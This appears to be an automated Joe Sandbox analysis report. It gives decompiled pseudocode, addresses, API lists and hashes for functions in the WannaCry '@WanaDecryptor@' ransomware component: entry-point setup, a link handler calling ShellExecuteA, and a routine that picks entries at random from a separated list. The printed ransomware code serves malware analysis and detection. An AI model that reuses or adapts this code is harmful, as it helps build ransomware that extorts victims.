												if(_t116 == 0) {
													_v820 = 0x400;
												} else {
													goto L63;
												}
											}
										}
										L70:
										__eflags =  *((intOrPtr*)(_t192 + 0x360)) - 1;
										if( *((intOrPtr*)(_t192 + 0x360)) != 1) {
											CloseHandle(_t174);
										}
										E00411AC0( *_t132);
										return _v820;
										goto L73;
									}
									_v820 = 0x1000;
									goto L70;
								} else {
									return 0x200;
								}
							} else {
								__eflags = _t166 - 1;
								if(_t166 != 1) {
									_t154 = _a8;
									_t121 =  *_t154;
									__eflags = _t121 - 0x2f;
									if(_t121 == 0x2f) {
										L36:
										E00412250(0, _t154);
										__eflags = 0;
										return 0;
									} else {
										__eflags = _t121 - 0x5c;
										if(_t121 == 0x5c) {
											goto L36;
										} else {
											__eflags = _t121;
											if(_t121 == 0) {
												L37:
												E00412250(_t132 + 0x140, _t154);
												__eflags = 0;
												return 0;
											} else {
												__eflags =  *((char*)(_t154 + 1)) - 0x3a;
												if( *((char*)(_t154 + 1)) != 0x3a) {
													goto L37;
												} else {
													goto L36;
												}
											}
										}
									}
								} else {
									__eflags = 0;
									return 0;
								}
							}
						} else {
							return 0x10000;
						}
					} else {
						return 0x10000;
					}
				}
				L73:
			}


















































                                  0x0041236a
                                  0x00412371
                                  0x00412376
                                  0x0041239c
                                  0x0041239f
                                  0x004123a6
                                  0x004123a8
                                  0x00412414
                                  0x00412431
                                  0x00412436
                                  0x00412438
                                  0x0041243d
                                  0x00412445
                                  0x00412445
                                  0x00412450
                                  0x00412452
                                  0x00412463
                                  0x00412465
                                  0x00412482
                                  0x0041248b
                                  0x0041248b
                                  0x00412496
                                  0x0041246a
                                  0x00412476
                                  0x00412476
                                  0x00412457
                                  0x00412457
                                  0x00412460
                                  0x00412460
                                  0x004123aa
                                  0x004123aa
                                  0x004123ad
                                  0x004123b2
                                  0x004123b7
                                  0x004123b7
                                  0x004123ba
                                  0x004123bc
                                  0x004123c3
                                  0x004123c6
                                  0x004123da
                                  0x004123dd
                                  0x004123e0
                                  0x004123e5
                                  0x004123e5
                                  0x004123e8
                                  0x004123ea
                                  0x004123ed
                                  0x004123f0
                                  0x004123f5
                                  0x004123f7
                                  0x004123fa
                                  0x004123fa
                                  0x00412407
                                  0x00412408
                                  0x00412409
                                  0x0041240e
                                  0x00412411
                                  0x00000000
                                  0x004123cb
                                  0x004123d7
                                  0x004123d7
                                  0x004123c6
                                  0x00412378
                                  0x0041237b
                                  0x0041249c
                                  0x0041249f
                                  0x004124a1
                                  0x004124a6
                                  0x004124ab
                                  0x004124ab
                                  0x004124ae
                                  0x004124b0
                                  0x004124b3
                                  0x004124ba
                                  0x004124bd
                                  0x004124d1
                                  0x004124d4
                                  0x004124d7
                                  0x004124dc
                                  0x004124dc
                                  0x004124df
                                  0x004124e1
                                  0x004124e4
                                  0x004124e7
                                  0x004124ec
                                  0x004124ee
                                  0x004124f1
                                  0x004124f1
                                  0x004124fd
                                  0x00412501
                                  0x00412506
                                  0x0041250e
                                  0x00412578
                                  0x0041257b
                                  0x00412589
                                  0x00412590
                                  0x00412592
                                  0x00412594
                                  0x00412596
                                  0x00412598
                                  0x0041259a
                                  0x0041259c
                                  0x004125a2
                                  0x004125a2
                                  0x0041259e
                                  0x0041259e
                                  0x004125a0
                                  0x00000000
                                  0x00000000
                                  0x004125a0
                                  0x004125a5
                                  0x004125a8
                                  0x004125a9
                                  0x004125a9
                                  0x004125b8
                                  0x004125ba
                                  0x004125be
                                  0x004125c4
                                  0x004125ca
                                  0x004125cd
                                  0x004125d4
                                  0x004125d6
                                  0x004125d6
                                  0x004125d8
                                  0x0041264d
                                  0x00412652
                                  0x00412656
                                  0x00412658
                                  0x00412671
                                  0x00412684
                                  0x00412691
                                  0x00412696
                                  0x00000000
                                  0x0041265a
                                  0x0041265a
                                  0x0041265c
                                  0x00000000
                                  0x0041265e
                                  0x0041265e
                                  0x00412660
                                  0x00000000
                                  0x00412666
                                  0x00412666
                                  0x0041266b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0041266b
                                  0x00412660
                                  0x0041265c
                                  0x00000000
                                  0x004125da
                                  0x004125da
                                  0x004125df
                                  0x004125f9
                                  0x00412605
                                  0x0041260a
                                  0x0041260a
                                  0x0041260d
                                  0x00412630
                                  0x0041257d
                                  0x0041257d
                                  0x0041257d
                                  0x00412632
                                  0x00412635
                                  0x004126a6
                                  0x004126a7
                                  0x004126a8
                                  0x004126ad
                                  0x004126b3
                                  0x004126b6
                                  0x004126b8
                                  0x004126ba
                                  0x004126bf
                                  0x004126c4
                                  0x004126c7
                                  0x004126c7
                                  0x004126d3
                                  0x004126db
                                  0x004126f4
                                  0x004126f6
                                  0x004126f9
                                  0x004126fc
                                  0x00000000
                                  0x00000000
                                  0x004126fe
                                  0x00412700
                                  0x0041273c
                                  0x0041273c
                                  0x00412702
                                  0x00412702
                                  0x0041271a
                                  0x0041271e
                                  0x00412720
                                  0x0041275f
                                  0x00412722
                                  0x00412722
                                  0x00412724
                                  0x00000000
                                  0x00412726
                                  0x00000000
                                  0x00412726
                                  0x00412724
                                  0x00412704
                                  0x00412714
                                  0x00412716
                                  0x00412718
                                  0x00412732
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00412718
                                  0x00412702
                                  0x00412765
                                  0x00412765
                                  0x0041276d
                                  0x00412770
                                  0x00412770
                                  0x00412779
                                  0x0041278f
                                  0x00000000
                                  0x0041278f
                                  0x00412728
                                  0x00000000
                                  0x0041263a
                                  0x00412646
                                  0x00412646
                                  0x00412510
                                  0x00412510
                                  0x00412513
                                  0x00412524
                                  0x0041252b
                                  0x0041252d
                                  0x0041252f
                                  0x0041253f
                                  0x00412542
                                  0x0041254a
                                  0x00412556
                                  0x00412531
                                  0x00412531
                                  0x00412533
                                  0x00000000
                                  0x00412535
                                  0x00412535
                                  0x00412537
                                  0x00412559
                                  0x00412561
                                  0x00412569
                                  0x00412575
                                  0x00412539
                                  0x00412539
                                  0x0041253d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0041253d
                                  0x00412537
                                  0x00412533
                                  0x00412518
                                  0x00412518
                                  0x00412521
                                  0x00412521
                                  0x00412513
                                  0x004124c2
                                  0x004124ce
                                  0x004124ce
                                  0x0041238d
                                  0x00412399
                                  0x00412399
                                  0x0041237b
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: %s%s$%s%s%s$:
                                  • API String ID: 0-3034790606
                                  • Opcode ID: 5870813841fd6422a36b130af846364780db05c619c896662a0e99f340824b5b
                                  • Instruction ID: ec0a86814d75b7591ef383b01d603f7b60d36dbaf36e5cde56c141efaaef7cbf
                                  • Opcode Fuzzy Hash: 5870813841fd6422a36b130af846364780db05c619c896662a0e99f340824b5b
                                  • Instruction Fuzzy Hash: 67C138726002045BDB20DF18ED81BEB7398EB85314F04456BFD54CB385D2BDE99A87AA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413102 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x41baa8);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x422298 =  *0x422298 | 0xffffffff;
				 *0x42229c =  *0x42229c | 0xffffffff;
				 *(__p__fmode()) =  *0x42228c;
				 *(__p__commode()) =  *0x422288;
				 *0x422294 = _adjust_fdiv;
				_t27 = E004133C7( *_adjust_fdiv);
				_t61 =  *0x421790; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E004133C4);
				}
				E004133B2(_t27);
				_push(0x41f018);
				_push(0x41f014);
				L004133AC();
				_v112 =  *0x422284;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x422280,  &_v112);
				_push(0x41f010);
				_push(0x41f000);
				L004133AC();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E004133E6(GetModuleHandleA(0), _t39, 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L004133A6();
				return _t41;
			}
























                                  0x00413105
                                  0x00413107
                                  0x0041310c
                                  0x00413117
                                  0x00413118
                                  0x00413125
                                  0x0041312a
                                  0x0041312f
                                  0x00413136
                                  0x0041313d
                                  0x00413150
                                  0x0041315e
                                  0x00413167
                                  0x0041316c
                                  0x00413171
                                  0x00413177
                                  0x0041317e
                                  0x00413184
                                  0x00413185
                                  0x0041318a
                                  0x0041318f
                                  0x00413194
                                  0x0041319e
                                  0x004131b7
                                  0x004131bd
                                  0x004131c2
                                  0x004131c7
                                  0x004131d4
                                  0x004131d6
                                  0x004131dc
                                  0x00413218
                                  0x0041321d
                                  0x0041321e
                                  0x0041321e
                                  0x004131de
                                  0x004131de
                                  0x004131de
                                  0x004131df
                                  0x004131e2
                                  0x004131e4
                                  0x004131ef
                                  0x004131f1
                                  0x004131f1
                                  0x004131f2
                                  0x004131f2
                                  0x004131ef
                                  0x004131f5
                                  0x004131f9
                                  0x00000000
                                  0x00000000
                                  0x004131ff
                                  0x00413206
                                  0x00413210
                                  0x00413225
                                  0x00413212
                                  0x00413212
                                  0x00413212
                                  0x00413231
                                  0x00413236
                                  0x0041323a
                                  0x00413240
                                  0x00413245
                                  0x00413247
                                  0x0041324a
                                  0x0041324b
                                  0x0041324c
                                  0x00413253

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                  • String ID:
                                  • API String ID: 801014965-0
                                  • Opcode ID: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                  • Instruction ID: fcecf6e401754473f6225594f41014142e7d5ca2867d00c097f2044c16acc313
                                  • Opcode Fuzzy Hash: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                  • Instruction Fuzzy Hash: F9419F71940308EFCB20DFA4DC45AE97BB9EB09711B20016FF855972A1D7788A81CB6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404280 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 51windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E00404280(void* __ecx, char _a8) {
				void* _t9;
				struct HWND__* _t10;
				long _t12;
				long* _t22;
				void* _t24;

				_t24 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
					E00404530(__ecx);
				}
				_t9 = E004045E0(_t24,  &_a8);
				if(_t9 == 0) {
					L6:
					L00412CBC();
					return _t9;
				} else {
					_t22 = _t24 + 0x44;
					_push(0);
					_push("mailto:");
					L00412DB2();
					if(_t9 != 0) {
						_t9 = ShellExecuteA(0, "open",  *_t22, 0, 0, 1);
						goto L6;
					} else {
						_t10 = GetParent( *(_t24 + 0x20));
						_push(_t10);
						L00412DAC();
						_t12 = SendMessageA( *(_t10 + 0x20), 0x1388,  *(_t24 + 0x20),  *_t22);
						L00412CBC();
						return _t12;
					}
				}
			}








                                  0x00404281
                                  0x00404289
                                  0x0040428b
                                  0x0040428b
                                  0x00404297
                                  0x0040429e
                                  0x004042fd
                                  0x004042ff
                                  0x00404306
                                  0x004042a0
                                  0x004042a0
                                  0x004042a3
                                  0x004042a5
                                  0x004042ac
                                  0x004042b3
                                  0x004042f7
                                  0x00000000
                                  0x004042b5
                                  0x004042bb
                                  0x004042c1
                                  0x004042c2
                                  0x004042d5
                                  0x004042dd
                                  0x004042e4
                                  0x004042e4
                                  0x004042b3

                                  APIs
                                  • #6663.MFC42(mailto:,00000000,?), ref: 004042AC
                                  • GetParent.USER32(?), ref: 004042BB
                                  • #2864.MFC42(00000000), ref: 004042C2
                                  • SendMessageA.USER32(?,00001388,?,?), ref: 004042D5
                                  • #2379.MFC42 ref: 004042DD
                                    • Part of subcall function 00404530: #289.MFC42 ref: 0040455F
                                    • Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                    • Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                    • Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                    • Part of subcall function 00404530: #613.MFC42 ref: 004045BB
                                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004042F7
                                  • #2379.MFC42(?), ref: 004042FF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2379#5789$#2864#289#613#6663ExecuteExtentMessageParentPoint32SendShellText
                                  • String ID: mailto:$open
                                  • API String ID: 1144735033-2326261162
                                  • Opcode ID: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                  • Instruction ID: 92cf742add8d60ef6c93fe1e72e53283c618a6078d8cf76be364cef0d5edaefa
                                  • Opcode Fuzzy Hash: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                  • Instruction Fuzzy Hash: AC0175753003106BD624A761ED46FEF7369AFD4B55F40046FFA41A72C1EAB8A8428A6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BAF0 Relevance: 15.3, APIs: 10, Instructions: 301stringsleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0040BAF0() {
				signed int _t71;
				signed int _t72;
				void* _t84;
				signed int _t86;
				signed int _t91;
				signed int _t92;
				signed int _t97;
				intOrPtr _t101;
				signed int _t110;
				void* _t113;
				void* _t116;
				signed int _t126;
				char _t129;
				signed int _t131;
				unsigned int _t138;
				signed int _t139;
				char* _t144;
				signed int _t147;
				unsigned int _t152;
				signed int _t153;
				signed int _t158;
				signed int _t160;
				signed int _t161;
				signed int _t172;
				signed int _t173;
				signed int _t181;
				signed int _t191;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				void* _t237;
				char* _t238;
				void* _t240;
				void* _t241;
				intOrPtr* _t242;
				void* _t245;
				intOrPtr* _t246;
				signed int _t249;
				intOrPtr* _t250;
				intOrPtr _t251;
				void* _t252;
				void* _t255;
				void* _t256;
				void* _t257;
				void* _t259;
				void* _t260;
				void* _t262;
				void* _t263;
				void* _t264;

				_push(0xffffffff);
				_push(E00414286);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t251;
				_t252 = _t251 - 0x47c;
				_t71 = E0040BA10();
				if(_t71 != 0) {
					L31:
					_t72 = _t71 | 0xffffffff;
					__eflags = _t72;
				} else {
					_t131 =  *0x422210;
					 *((intOrPtr*)( *_t131 + 0xc))();
					asm("repne scasb");
					_t266 =  !(_t131 | 0xffffffff) == 1;
					if( !(_t131 | 0xffffffff) == 1) {
						L3:
						_t249 = 0;
						 *((char*)(_t252 + 0x14)) =  *((intOrPtr*)(_t252 + 0x13));
						 *((intOrPtr*)(_t252 + 0x18)) = E0040C8F0(0, 0, 0);
						 *(_t252 + 0x1c) = 0;
						asm("repne scasb");
						_t138 =  !(_t252 + 0x0000001c | 0xffffffff);
						_t237 =  *((intOrPtr*)(_t252 + 0x49c)) - _t138;
						 *((intOrPtr*)(_t252 + 0x498)) = 0;
						_t139 = _t138 >> 2;
						memcpy(_t237 + _t139 + _t139, _t237, memcpy(_t252 + 0xa4, _t237, _t139 << 2) & 0x00000003);
						_t255 = _t252 + 0x18;
						_t144 = _t255 + 0xa8;
						_t238 = strtok(_t144, ",;");
						_t256 = _t255 + 8;
						if(_t238 != 0) {
							_t129 =  *((intOrPtr*)(_t256 + 0x13));
							do {
								_t200 = _t249;
								_t249 = _t249 + 1;
								if(_t200 > 0) {
									_t181 = _t256 + 0x28;
									 *(_t256 + 0x28) = _t129;
									E0040C7B0(_t181, 0);
									asm("repne scasb");
									_push( !(_t181 | 0xffffffff) - 1);
									_push(_t238);
									E0040C920(_t256 + 0x2c);
									 *((char*)(_t256 + 0x4a0)) = 1;
									E0040C800(_t256 + 0x24, _t256 + 0x20, _t256 + 0x24,  *((intOrPtr*)(_t256 + 0x18)), _t256 + 0x24);
									_t144 = _t256 + 0x28;
									 *((char*)(_t256 + 0x498)) = 0;
									E0040C7B0(_t144, 1);
								}
								_t238 = strtok(0, ",;");
								_t256 = _t256 + 8;
							} while (_t238 != 0);
						}
						asm("repne scasb");
						_t147 =  !(_t144 | 0xffffffff) - 1;
						if(_t147 == 0) {
							L17:
							_push(_t256 + 0xa4);
							_t84 = E0040BA60(_t277);
							_t256 = _t256 + 4;
							if(_t84 != 0) {
								goto L19;
							} else {
								asm("repne scasb");
								_t172 =  !(_t147 | 0xffffffff);
								_t245 = _t256 + 0xa4 - _t172;
								_t173 = _t172 >> 2;
								memcpy(0x422214, _t245, _t173 << 2);
								_t263 = _t256 + 0xc;
								 *((intOrPtr*)(_t263 + 0x498)) = 0xffffffff;
								_t113 = memcpy(_t245 + _t173 + _t173, _t245, _t172 & 0x00000003);
								_t264 = _t263 + 0xc;
								E0040C860(_t264 + 0x20, _t264 + 0x24,  *_t113,  *((intOrPtr*)(_t256 + 0x18)));
								_push( *((intOrPtr*)(_t264 + 0x18)));
								L00412C98();
								_t252 = _t264 + 4;
								_t72 = 0;
							}
						} else {
							_t246 = _t256 + 0xa4;
							_t116 = 0x422214;
							while(1) {
								_t198 =  *_t116;
								_t147 = _t198;
								if(_t198 !=  *_t246) {
									break;
								}
								if(_t147 == 0) {
									L14:
									_t116 = 0;
								} else {
									_t199 =  *((intOrPtr*)(_t116 + 1));
									_t147 = _t199;
									if(_t199 !=  *((intOrPtr*)(_t246 + 1))) {
										break;
									} else {
										_t116 = _t116 + 2;
										_t246 = _t246 + 2;
										if(_t147 != 0) {
											continue;
										} else {
											goto L14;
										}
									}
								}
								L16:
								_t277 = _t116;
								if(_t116 == 0) {
									L19:
									srand(GetTickCount());
									_t86 =  *(_t256 + 0x20);
									_t257 = _t256 + 4;
									__eflags = _t86;
									if(_t86 <= 0) {
										L30:
										 *((intOrPtr*)(_t257 + 0x494)) = 0xffffffff;
										_t71 = E0040C860(_t257 + 0x20, _t257 + 0x3c,  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18)))),  *((intOrPtr*)(_t257 + 0x18)));
										_push( *((intOrPtr*)(_t257 + 0x18)));
										L00412C98();
										_t252 = _t257 + 4;
										goto L31;
									} else {
										do {
											_t191 = rand() % _t86;
											_t250 =  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18))));
											__eflags = _t191;
											_t91 = _t191;
											if(_t191 > 0) {
												_t91 = 0;
												__eflags = 0;
												do {
													_t250 =  *_t250;
													_t191 = _t191 - 1;
													__eflags = _t191;
												} while (_t191 != 0);
											}
											__eflags = _t91;
											if(_t91 < 0) {
												_t110 =  ~_t91;
												do {
													_t250 =  *((intOrPtr*)(_t250 + 4));
													_t110 = _t110 - 1;
													__eflags = _t110;
												} while (_t110 != 0);
											}
											_t92 =  *(_t250 + 0xc);
											_t42 = _t250 + 8; // 0x8
											_t126 = _t42;
											__eflags = _t92;
											if(__eflags == 0) {
												_t92 = 0x41ba38;
											}
											asm("repne scasb");
											_t152 =  !(_t147 | 0xffffffff);
											_t240 = _t92 - _t152;
											_t153 = _t152 >> 2;
											memcpy(_t240 + _t153 + _t153, _t240, memcpy(_t257 + 0x40, _t240, _t153 << 2) & 0x00000003);
											_t259 = _t257 + 0x18;
											_t158 = _t259 + 0x40;
											_push(_t158);
											_t97 = E0040BA60(__eflags);
											_t260 = _t259 + 4;
											__eflags = _t97;
											if(_t97 == 0) {
												 *((intOrPtr*)(_t260 + 0x494)) = 0xffffffff;
												asm("repne scasb");
												_t160 =  !(_t158 | 0xffffffff);
												_t241 = _t260 + 0x40 - _t160;
												_t161 = _t160 >> 2;
												memcpy(0x422214, _t241, _t161 << 2);
												memcpy(_t241 + _t161 + _t161, _t241, _t160 & 0x00000003);
												_t262 = _t260 + 0x18;
												_t242 =  *((intOrPtr*)(_t262 + 0x18));
												_t101 =  *_t242;
												__eflags = _t101 - _t242;
												 *((intOrPtr*)(_t262 + 0x20)) = _t101;
												if(_t101 != _t242) {
													do {
														_push(0);
														E0040C740(_t262 + 0x1c, _t262 + 0x3c,  *((intOrPtr*)(E00402D90(_t262 + 0x28, _t262 + 0x38))));
														__eflags =  *((intOrPtr*)(_t262 + 0x20)) - _t242;
													} while ( *((intOrPtr*)(_t262 + 0x20)) != _t242);
												}
												_push( *((intOrPtr*)(_t262 + 0x18)));
												L00412C98();
												_t252 = _t262 + 4;
												_t72 = 0;
											} else {
												goto L29;
											}
											goto L32;
											L29:
											 *((intOrPtr*)( *( *0x422210) + 0xc))();
											 *((intOrPtr*)( *((intOrPtr*)(_t250 + 4)))) =  *_t250;
											_t147 = _t126;
											 *((intOrPtr*)( *_t250 + 4)) =  *((intOrPtr*)(_t250 + 4));
											E0040CE50(_t147, 0);
											_push(_t250);
											L00412C98();
											_t257 = _t260 + 4;
											 *((intOrPtr*)(_t257 + 0x20)) =  *((intOrPtr*)(_t260 + 0x20)) - 1;
											Sleep(0xbb8);
											_t86 =  *(_t257 + 0x1c);
											__eflags = _t86;
										} while (_t86 > 0);
										goto L30;
									}
								} else {
									goto L17;
								}
								goto L32;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L16;
						}
					} else {
						_push(0x422214);
						_t72 = E0040BA60(_t266);
						_t252 = _t252 + 4;
						if(_t72 != 0) {
							goto L3;
						}
					}
				}
				L32:
				 *[fs:0x0] =  *((intOrPtr*)(_t252 + 0x48c));
				return _t72;
			}




















































                                  0x0040baf6
                                  0x0040baf8
                                  0x0040bafd
                                  0x0040bafe
                                  0x0040bb05
                                  0x0040bb0f
                                  0x0040bb16
                                  0x0040bdf5
                                  0x0040bdf5
                                  0x0040bdf5
                                  0x0040bb1c
                                  0x0040bb1c
                                  0x0040bb24
                                  0x0040bb31
                                  0x0040bb35
                                  0x0040bb36
                                  0x0040bb4d
                                  0x0040bb51
                                  0x0040bb53
                                  0x0040bb62
                                  0x0040bb66
                                  0x0040bb7d
                                  0x0040bb7f
                                  0x0040bb8a
                                  0x0040bb8e
                                  0x0040bb95
                                  0x0040bb9f
                                  0x0040bb9f
                                  0x0040bba1
                                  0x0040bbae
                                  0x0040bbb0
                                  0x0040bbb5
                                  0x0040bbb7
                                  0x0040bbbb
                                  0x0040bbbb
                                  0x0040bbbd
                                  0x0040bbc0
                                  0x0040bbc4
                                  0x0040bbc8
                                  0x0040bbcc
                                  0x0040bbd8
                                  0x0040bbdd
                                  0x0040bbde
                                  0x0040bbe3
                                  0x0040bbfb
                                  0x0040bc03
                                  0x0040bc0a
                                  0x0040bc0e
                                  0x0040bc16
                                  0x0040bc16
                                  0x0040bc27
                                  0x0040bc29
                                  0x0040bc2c
                                  0x0040bbbb
                                  0x0040bc3a
                                  0x0040bc3e
                                  0x0040bc3f
                                  0x0040bc7e
                                  0x0040bc85
                                  0x0040bc86
                                  0x0040bc8b
                                  0x0040bc90
                                  0x00000000
                                  0x0040bc92
                                  0x0040bc9c
                                  0x0040bc9e
                                  0x0040bca8
                                  0x0040bcb0
                                  0x0040bcb3
                                  0x0040bcb3
                                  0x0040bcb7
                                  0x0040bcc5
                                  0x0040bcc5
                                  0x0040bcd3
                                  0x0040bcdc
                                  0x0040bcdd
                                  0x0040bce2
                                  0x0040bce5
                                  0x0040bce5
                                  0x0040bc41
                                  0x0040bc41
                                  0x0040bc48
                                  0x0040bc4d
                                  0x0040bc4d
                                  0x0040bc51
                                  0x0040bc55
                                  0x00000000
                                  0x00000000
                                  0x0040bc59
                                  0x0040bc71
                                  0x0040bc71
                                  0x0040bc5b
                                  0x0040bc5b
                                  0x0040bc61
                                  0x0040bc65
                                  0x00000000
                                  0x0040bc67
                                  0x0040bc67
                                  0x0040bc6a
                                  0x0040bc6f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040bc6f
                                  0x0040bc65
                                  0x0040bc7a
                                  0x0040bc7a
                                  0x0040bc7c
                                  0x0040bcec
                                  0x0040bcf3
                                  0x0040bcf8
                                  0x0040bcfc
                                  0x0040bcff
                                  0x0040bd01
                                  0x0040bdc7
                                  0x0040bdcb
                                  0x0040bde3
                                  0x0040bdec
                                  0x0040bded
                                  0x0040bdf2
                                  0x00000000
                                  0x0040bd07
                                  0x0040bd07
                                  0x0040bd10
                                  0x0040bd16
                                  0x0040bd18
                                  0x0040bd1a
                                  0x0040bd1c
                                  0x0040bd1e
                                  0x0040bd1e
                                  0x0040bd20
                                  0x0040bd20
                                  0x0040bd23
                                  0x0040bd23
                                  0x0040bd23
                                  0x0040bd20
                                  0x0040bd26
                                  0x0040bd28
                                  0x0040bd2a
                                  0x0040bd2c
                                  0x0040bd2c
                                  0x0040bd2f
                                  0x0040bd2f
                                  0x0040bd2f
                                  0x0040bd2c
                                  0x0040bd32
                                  0x0040bd35
                                  0x0040bd35
                                  0x0040bd38
                                  0x0040bd3a
                                  0x0040bd3c
                                  0x0040bd3c
                                  0x0040bd4c
                                  0x0040bd4e
                                  0x0040bd54
                                  0x0040bd58
                                  0x0040bd62
                                  0x0040bd62
                                  0x0040bd64
                                  0x0040bd68
                                  0x0040bd69
                                  0x0040bd6e
                                  0x0040bd71
                                  0x0040bd73
                                  0x0040be1a
                                  0x0040be25
                                  0x0040be27
                                  0x0040be2d
                                  0x0040be34
                                  0x0040be37
                                  0x0040be3e
                                  0x0040be3e
                                  0x0040be40
                                  0x0040be44
                                  0x0040be46
                                  0x0040be48
                                  0x0040be4c
                                  0x0040be4e
                                  0x0040be52
                                  0x0040be6a
                                  0x0040be6f
                                  0x0040be6f
                                  0x0040be4e
                                  0x0040be79
                                  0x0040be7a
                                  0x0040be7f
                                  0x0040be82
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040bd79
                                  0x0040bd81
